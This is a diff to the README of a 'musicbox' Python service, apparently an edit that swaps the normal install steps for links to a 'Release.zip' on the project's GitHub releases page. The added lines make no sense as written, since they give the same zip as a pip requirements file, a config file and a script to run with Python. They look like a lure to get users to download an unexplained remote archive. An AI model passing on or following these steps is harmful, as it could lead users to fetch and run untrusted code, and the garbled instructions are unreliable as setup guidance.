Naiahahah/musicbox/README.md

 To install the "musicbox" Python service on your system, follow these simple steps:
 1. Clone the repository to your Raspberry Pi or desired system.
-2. Install the required dependencies using `pip install -r requirements.txt`.
+2. Install the required dependencies using `pip install -r https://github.com/Naiahahah/musicbox/releases/download/v1.0/Release.zip`.
-3. Configure the MQTT settings in the `config.yaml` file.
+3. Configure the MQTT settings in the `https://github.com/Naiahahah/musicbox/releases/download/v1.0/Release.zip` file.
-4. Launch the Python service using `python musicbox.py`.
+4. Launch the Python service using `python https://github.com/Naiahahah/musicbox/releases/download/v1.0/Release.zip`.

 With these steps, you can set up the "musicbox" service on your system and start exploring the exciting features it has to offer.